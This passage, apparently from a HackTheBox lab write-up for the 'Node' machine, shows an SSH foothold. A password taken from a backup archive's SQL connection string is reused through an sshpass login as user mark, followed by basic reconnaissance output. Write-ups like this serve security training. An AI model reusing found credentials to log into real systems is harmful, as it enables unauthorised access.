SSH
The web server had a backup archive, which contains a SQL connection string with a credential
┌──(kali㉿kali)-[~/archive/htb/labs/node]
└─$ sshpass -p 5AYRft73VtFpc84k ssh mark@$IP
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
.-.
.-'``(|||)
,`\ \ `-`. 88 88
/ \ '``-. ` 88 88
.-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88
(:::) : ___ 88 88 88 88 88 88 88 88 88 88 88
`-` ` , : 88 88 88 88 88 88 88 88 88 88 88
\ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88
`./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888'
`-..-( )
`-`
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ whoami
mark
mark@node:~$ hostname
node
mark@node:~$ ifconfig
ens33 link encap:Ethernet HWaddr 00:50:56:b9:1b:9d
inet addr:10.10.10.58 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feb9:1b9d/64 Scope:Link
up broadcast running multicast mtu:1500 Metric:1
rx packets:634840 errors:0 dropped:116 overruns:0 frame:0
tx packets:1046080 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:76555932 (76.5 MB) TX bytes:1520857627 (1.5 GB)
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
up loopback running mtu:65536 Metric:1
rx packets:90371 errors:0 dropped:0 overruns:0 frame:0
tx packets:90371 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
rx bytes:7420139 (7.4 MB) TX bytes:7420139 (7.4 MB)
Initial Foothold established to the target system as mark
Password reuse confirmed